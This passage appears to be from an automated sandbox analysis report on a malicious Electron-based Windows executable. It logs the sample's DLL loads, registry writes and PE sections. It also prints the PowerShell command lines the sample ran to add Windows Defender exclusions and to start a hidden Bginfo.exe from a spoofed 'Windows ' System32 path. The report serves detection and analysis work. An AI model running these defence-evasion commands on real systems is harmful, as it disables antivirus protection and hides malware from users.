Source: C:\Windows \System32\winSAT.exeSection loaded: windows.storage.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: snmpapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: odbc32.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: globinputhost.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: inetmib1.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windows.ui.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: npmproxy.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mf.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
Source: MyElectronApp.lnk.16.drLNK file: ..\..\..\..\..\..\Local\Programs\NSIS\NSIS.exe
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindow detected: Number of UI elements: 15
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindow detected: Number of UI elements: 15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\31e24c48-f042-5745-a165-04e896e763b7Jump to behavior
Source: YoS6ZBCcUy.exeStatic file information: File size 84269376 > 1048576
Source: YoS6ZBCcUy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb<: source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2147033936.0000000004B82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ffmpeg.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb,q source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vulkan-1.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2197462818.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2147240320.0000000004B70000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2074996101.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077198025.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2075174807.0000000004970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: electron.exe.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: libGLESv2.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll15\Release\Dll15.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vk_swiftshader.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2143596568.000000000475E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\BGInfo.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle HiddenJump to behavior
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9A960 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9A960
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe.0.drStatic PE information: section name: .gxfg
Source: NSIS.exe.0.drStatic PE information: section name: .retplne
Source: NSIS.exe.0.drStatic PE information: section name: .rodata
Source: NSIS.exe.0.drStatic PE information: section name: CPADinfo
Source: NSIS.exe.0.drStatic PE information: section name: LZMADEC
Source: NSIS.exe.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe.0.drStatic PE information: section name: malloc_h
Source: NSIS.exe.0.drStatic PE information: section name: prot
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.0.drStatic PE information: section name: .retplne
Source: libEGL.dll0.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe0.0.drStatic PE information: section name: .gxfg
Source: NSIS.exe0.0.drStatic PE information: section name: .retplne
Source: NSIS.exe0.0.drStatic PE information: section name: .rodata
Source: NSIS.exe0.0.drStatic PE information: section name: CPADinfo
Source: NSIS.exe0.0.drStatic PE information: section name: LZMADEC
Source: NSIS.exe0.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe0.0.drStatic PE information: section name: malloc_h
Source: NSIS.exe0.0.drStatic PE information: section name: prot
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: winSAT.exe.10.drStatic PE information: section name: PAGELK
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .00cfg
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .gxfg
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .retplne
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: _RDATA
Source: version.dll.10.drStatic PE information: section name: .00cfg
Source: version.dll.10.drStatic PE information: section name: .gxfg
Source: version.dll.10.drStatic PE information: section name: .retplne
Source: version.dll.10.drStatic PE information: section name: _RDATA
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .00cfg
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .gxfg
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .retplne
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: _RDATA
Source: 039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll.10.drStatic PE information: section name: .00cfg
Source: version.dll0.10.drStatic PE information: section name: .00cfg
